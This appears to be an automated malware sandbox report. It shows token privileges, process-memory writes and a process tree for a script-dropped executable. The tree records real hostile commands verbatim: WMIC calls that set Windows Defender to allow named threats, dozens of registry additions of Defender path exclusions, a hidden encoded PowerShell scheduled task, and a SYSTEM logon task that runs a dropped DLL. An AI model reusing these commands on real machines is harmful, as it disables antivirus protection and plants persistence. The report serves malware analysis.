Token: 35	1816	WMIC.exe
Token: SeDebugPrivilege	856	powershell.EXE
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeIncreaseQuotaPrivilege	1712	WMIC.exe
Token: SeSecurityPrivilege	1712	WMIC.exe
Token: SeTakeOwnershipPrivilege	1712	WMIC.exe
Token: SeLoadDriverPrivilege	1712	WMIC.exe
Token: SeSystemProfilePrivilege	1712	WMIC.exe
Token: SeSystemtimePrivilege	1712	WMIC.exe
Token: SeProfSingleProcessPrivilege	1712	WMIC.exe
Token: SeIncBasePriorityPrivilege	1712	WMIC.exe
Token: SeCreatePagefilePrivilege	1712	WMIC.exe
Token: SeBackupPrivilege	1712	WMIC.exe
Token: SeRestorePrivilege	1712	WMIC.exe
Token: SeShutdownPrivilege	1712	WMIC.exe
Token: SeDebugPrivilege	1712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1712	WMIC.exe
Token: SeRemoteShutdownPrivilege	1712	WMIC.exe
Token: SeUndockPrivilege	1712	WMIC.exe
Token: SeManageVolumePrivilege	1712	WMIC.exe
Token: 33	1712	WMIC.exe
Token: 34	1712	WMIC.exe
Token: 35	1712	WMIC.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeIncreaseQuotaPrivilege	788	WMIC.exe
Token: SeSecurityPrivilege	788	WMIC.exe
Token: SeTakeOwnershipPrivilege	788	WMIC.exe
Token: SeLoadDriverPrivilege	788	WMIC.exe
Token: SeSystemProfilePrivilege	788	WMIC.exe
Token: SeSystemtimePrivilege	788	WMIC.exe
Token: SeProfSingleProcessPrivilege	788	WMIC.exe
Token: SeIncBasePriorityPrivilege	788	WMIC.exe
Token: SeCreatePagefilePrivilege	788	WMIC.exe
Token: SeBackupPrivilege	788	WMIC.exe
Token: SeRestorePrivilege	788	WMIC.exe
Token: SeShutdownPrivilege	788	WMIC.exe
Token: SeDebugPrivilege	788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	788	WMIC.exe
Token: SeRemoteShutdownPrivilege	788	WMIC.exe
Token: SeUndockPrivilege	788	WMIC.exe
Token: SeManageVolumePrivilege	788	WMIC.exe
Token: 33	788	WMIC.exe
Token: 34	788	WMIC.exe
Token: 35	788	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exewXcYjW.execmd.exeforfiles.execmd.exetaskeng.exepowershell.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.EXE

description	pid	process	target process
PID 1636 wrote to memory of 2040	1636	WScript.exe	wXcYjW.exe
PID 1636 wrote to memory of 2040	1636	WScript.exe	wXcYjW.exe
PID 1636 wrote to memory of 2040	1636	WScript.exe	wXcYjW.exe
PID 1636 wrote to memory of 2040	1636	WScript.exe	wXcYjW.exe
PID 2040 wrote to memory of 1288	2040	wXcYjW.exe	cmd.exe
PID 2040 wrote to memory of 1288	2040	wXcYjW.exe	cmd.exe
PID 2040 wrote to memory of 1288	2040	wXcYjW.exe	cmd.exe
PID 2040 wrote to memory of 1288	2040	wXcYjW.exe	cmd.exe
PID 1288 wrote to memory of 828	1288	cmd.exe	forfiles.exe
PID 1288 wrote to memory of 828	1288	cmd.exe	forfiles.exe
PID 1288 wrote to memory of 828	1288	cmd.exe	forfiles.exe
PID 1288 wrote to memory of 828	1288	cmd.exe	forfiles.exe
PID 828 wrote to memory of 1784	828	forfiles.exe	cmd.exe
PID 828 wrote to memory of 1784	828	forfiles.exe	cmd.exe
PID 828 wrote to memory of 1784	828	forfiles.exe	cmd.exe
PID 828 wrote to memory of 1784	828	forfiles.exe	cmd.exe
PID 1784 wrote to memory of 1524	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1524	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1524	1784	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1524	1784	cmd.exe	powershell.exe
PID 2040 wrote to memory of 1096	2040	wXcYjW.exe	schtasks.exe
PID 2040 wrote to memory of 1096	2040	wXcYjW.exe	schtasks.exe
PID 2040 wrote to memory of 1096	2040	wXcYjW.exe	schtasks.exe
PID 2040 wrote to memory of 1096	2040	wXcYjW.exe	schtasks.exe
PID 2040 wrote to memory of 1000	2040	wXcYjW.exe	schtasks.exe
PID 2040 wrote to memory of 1000	2040	wXcYjW.exe	schtasks.exe
PID 2040 wrote to memory of 1000	2040	wXcYjW.exe	schtasks.exe
PID 2040 wrote to memory of 1000	2040	wXcYjW.exe	schtasks.exe
PID 2016 wrote to memory of 856	2016	taskeng.exe	powershell.EXE
PID 2016 wrote to memory of 856	2016	taskeng.exe	powershell.EXE
PID 2016 wrote to memory of 856	2016	taskeng.exe	powershell.EXE
PID 1524 wrote to memory of 1816	1524	powershell.exe	WMIC.exe
PID 1524 wrote to memory of 1816	1524	powershell.exe	WMIC.exe
PID 1524 wrote to memory of 1816	1524	powershell.exe	WMIC.exe
PID 1524 wrote to memory of 1816	1524	powershell.exe	WMIC.exe
PID 1288 wrote to memory of 1472	1288	cmd.exe	forfiles.exe
PID 1288 wrote to memory of 1472	1288	cmd.exe	forfiles.exe
PID 1288 wrote to memory of 1472	1288	cmd.exe	forfiles.exe
PID 1288 wrote to memory of 1472	1288	cmd.exe	forfiles.exe
PID 1472 wrote to memory of 1800	1472	forfiles.exe	cmd.exe
PID 1472 wrote to memory of 1800	1472	forfiles.exe	cmd.exe
PID 1472 wrote to memory of 1800	1472	forfiles.exe	cmd.exe
PID 1472 wrote to memory of 1800	1472	forfiles.exe	cmd.exe
PID 1800 wrote to memory of 1764	1800	cmd.exe	powershell.exe
PID 1800 wrote to memory of 1764	1800	cmd.exe	powershell.exe
PID 1800 wrote to memory of 1764	1800	cmd.exe	powershell.exe
PID 1800 wrote to memory of 1764	1800	cmd.exe	powershell.exe
PID 1764 wrote to memory of 1712	1764	powershell.exe	WMIC.exe
PID 1764 wrote to memory of 1712	1764	powershell.exe	WMIC.exe
PID 1764 wrote to memory of 1712	1764	powershell.exe	WMIC.exe
PID 1764 wrote to memory of 1712	1764	powershell.exe	WMIC.exe
PID 1288 wrote to memory of 1636	1288	cmd.exe	forfiles.exe
PID 1288 wrote to memory of 1636	1288	cmd.exe	forfiles.exe
PID 1288 wrote to memory of 1636	1288	cmd.exe	forfiles.exe
PID 1288 wrote to memory of 1636	1288	cmd.exe	forfiles.exe
PID 1636 wrote to memory of 520	1636	forfiles.exe	cmd.exe
PID 1636 wrote to memory of 520	1636	forfiles.exe	cmd.exe
PID 1636 wrote to memory of 520	1636	forfiles.exe	cmd.exe
PID 1636 wrote to memory of 520	1636	forfiles.exe	cmd.exe
PID 520 wrote to memory of 1240	520	cmd.exe	powershell.exe
PID 520 wrote to memory of 1240	520	cmd.exe	powershell.exe
PID 520 wrote to memory of 1240	520	cmd.exe	powershell.exe
PID 520 wrote to memory of 1240	520	cmd.exe	powershell.exe
PID 856 wrote to memory of 1308	856	powershell.EXE	gpupdate.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IvHUBr2n.wsf"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1636

C:\WINDOWS\Temp\NUhOkhDLGuAssiyo\wXcYjW.exe
"C:\WINDOWS\Temp\NUhOkhDLGuAssiyo\wXcYjW.exe" /S /UPDATE
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
- Suspicious use of WriteProcessMemory
PID:1288

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
- Suspicious use of WriteProcessMemory
PID:828

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Suspicious use of WriteProcessMemory
PID:1784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
- Suspicious use of WriteProcessMemory
PID:1472

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:788

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gFfcfjrZr" /SC once /ST 01:53:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1096

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gFfcfjrZr"
3⤵
PID:1000

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gFfcfjrZr"
3⤵
PID:1588

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:32
3⤵
PID:988

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1692

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1376

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:556

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:552

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1496

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:992

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\nkORusZIOtymIvqi\chWIBskG\HuewoDDRLgDkPuJZ.wsf"
3⤵
PID:792

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\nkORusZIOtymIvqi\chWIBskG\HuewoDDRLgDkPuJZ.wsf"
3⤵
PID:1100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HthpyKCKweUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HthpyKCKweUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MDxTggLfPzSwC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MDxTggLfPzSwC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WmvPJtLIKNyrEpXovCR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WmvPJtLIKNyrEpXovCR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XNgjElXjDPOU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XNgjElXjDPOU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dPjFpxJDU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dPjFpxJDU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nvsfbntJuIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1496

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nvsfbntJuIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HGpvCwmnXnCWXNVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HGpvCwmnXnCWXNVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\djDdtrKzKybho" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1784

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\djDdtrKzKybho" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OojwBImzJBfZBzacm" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1292

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OojwBImzJBfZBzacm" /t REG_DWORD /d 0 /reg:64
4⤵
PID:280

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HthpyKCKweUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HthpyKCKweUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1096

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MDxTggLfPzSwC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MDxTggLfPzSwC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WmvPJtLIKNyrEpXovCR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WmvPJtLIKNyrEpXovCR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:620

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XNgjElXjDPOU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XNgjElXjDPOU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1272

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dPjFpxJDU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dPjFpxJDU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nvsfbntJuIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nvsfbntJuIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1764

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HGpvCwmnXnCWXNVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HGpvCwmnXnCWXNVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\djDdtrKzKybho" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\djDdtrKzKybho" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1200

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OojwBImzJBfZBzacm" /t REG_DWORD /d 0 /reg:32
4⤵
PID:596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OojwBImzJBfZBzacm" /t REG_DWORD /d 0 /reg:64
4⤵
PID:856

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nkORusZIOtymIvqi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:832

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zKDpYFaFYIkeffhio"
3⤵
PID:1684

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zKDpYFaFYIkeffhio"
3⤵
PID:816

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "zKDpYFaFYIkeffhio2"
3⤵
PID:1308

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zKDpYFaFYIkeffhio2"
3⤵
PID:1664

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qEybaWdEdpnCVpbIN"
3⤵
PID:1472

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qEybaWdEdpnCVpbIN"
3⤵
PID:1588

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qEybaWdEdpnCVpbIN2"
3⤵
PID:1548

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qEybaWdEdpnCVpbIN2"
3⤵
PID:408

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "onTBwShLgPcBjWSlOVF"
3⤵
PID:1376

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "onTBwShLgPcBjWSlOVF"
3⤵
PID:1360

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "onTBwShLgPcBjWSlOVF2"
3⤵
PID:1368

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "onTBwShLgPcBjWSlOVF2"
3⤵
PID:1496

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nYJlTJzWVEyOlthWAPj"
3⤵
PID:1328

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nYJlTJzWVEyOlthWAPj"
3⤵
PID:920

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nYJlTJzWVEyOlthWAPj2"
3⤵
PID:1660

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nYJlTJzWVEyOlthWAPj2"
3⤵
PID:856

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dPjFpxJDU\JnbRdx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "GvmHufwuHmOAaOC" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1812

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jUAGDVlVlUNvSbV"
3⤵
PID:1788

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jUAGDVlVlUNvSbV"
3⤵
PID:744

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jUAGDVlVlUNvSbV2"
3⤵
PID:280

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jUAGDVlVlUNvSbV2"
